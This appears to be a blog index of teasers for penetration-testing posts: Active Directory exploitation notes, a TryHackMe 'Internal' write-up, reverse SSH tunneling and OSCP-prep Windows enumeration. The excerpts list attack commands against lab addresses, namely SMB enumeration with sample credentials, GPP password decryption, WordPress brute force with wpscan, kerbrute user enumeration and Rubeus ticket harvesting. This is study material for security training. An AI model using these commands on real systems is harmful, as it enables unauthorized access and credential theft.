Active Directory Exploitation

Initial access SMB Enumeration smbmap -H 10.10.10.100 smbmap -H 10.10.10.100 -R # recursive smbmap -H 10.10.10.192 -u null smbmap -H 10.10.10.100 -d domain.local -u USERNAME -p PASSWORD smbclient \\\\10.10.10.169\\NETLOGON -U 'melanie'%'Welcome123!' If access on GPO Policies search for cpasswords in "domain.local/Policies/{xx-xx-xx}/MACHINE/Preferences/Groups/Groups.xml" and decrypt with gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ ASREPRoast Finding users that don't require preauth. We can... » read more

0
Read
xNULL
THM Internal

THM Internal This was an amazing challenge! I learned a few new tricks to thought about documenting it here real quick It all started with a WordPress site.... Easy bruteforce with wpscan wpscan --url http://10.10.40.183/wordpress/ -U wp_users.txt -P /usr/share/wordlists/rockyou.txt Lucky weeee. We got the admin password. First thing to do is insert a reverse shell... » read more

0
Read
xNULL
Exposing services with reverse SSH tunnels

Exposing services with reverse SSH tunnels Reverse SSH port forwarding specifies that the given port on the remote server host is to be forwarded to the given host and port on the local side. -L is a local tunnel (YOU <-- CLIENT). If a site was blocked, you can forward the traffic to a server... » read more

0
Read
xNULL
Windows-Exploitation

WIP... Here we go... A collection of commands for AD enumeration and exploitation for OSCP preparation. User Enumeration Enumerate users for domain CONTROLLER.local on DC CONTROLLER.local kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local /usr/share/wordlists/User.txt Ticket harvesting and Passwort Bruteforcing Capture TGTs sent to the KDC every 30 seconds Rubeus.exe harvest /interval:30 User : CONTROLLER-1$@CONTROLLER.LOCAL StartTime :... » read more

0
Read
xNULL